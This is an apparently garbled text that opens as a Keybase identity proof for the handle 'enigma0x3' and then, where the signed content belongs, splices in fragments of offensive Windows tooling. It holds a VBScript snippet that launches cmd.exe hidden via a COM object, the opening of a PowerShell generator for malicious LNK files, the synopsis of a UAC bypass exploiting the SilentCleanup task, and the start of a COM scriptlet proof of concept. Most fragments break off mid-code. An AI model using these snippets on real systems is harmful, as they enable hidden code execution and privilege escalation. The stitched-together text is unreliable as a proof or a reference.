I hereby claim:
- I am enigma0x3 on github.
- I am enigma0x3 (https://keybase.io/enigma0x3) on keybase.
- I have a public key whose fingerprint is ACA2 EE69 66CD 2383 F8CF 98E7 BD02 7173 DFDC DF56
To claim this, I am signing this object:
<script language="VBScript">
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "cmd.exe",Null,"C:\Windows\System32",Null,0
self.close
</script>

function Create-LNKPayload{
<#
.SYNOPSIS
Generates a malicious LNK file
.PARAMETER LNKName
Name of the LNK file you want to create.

function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[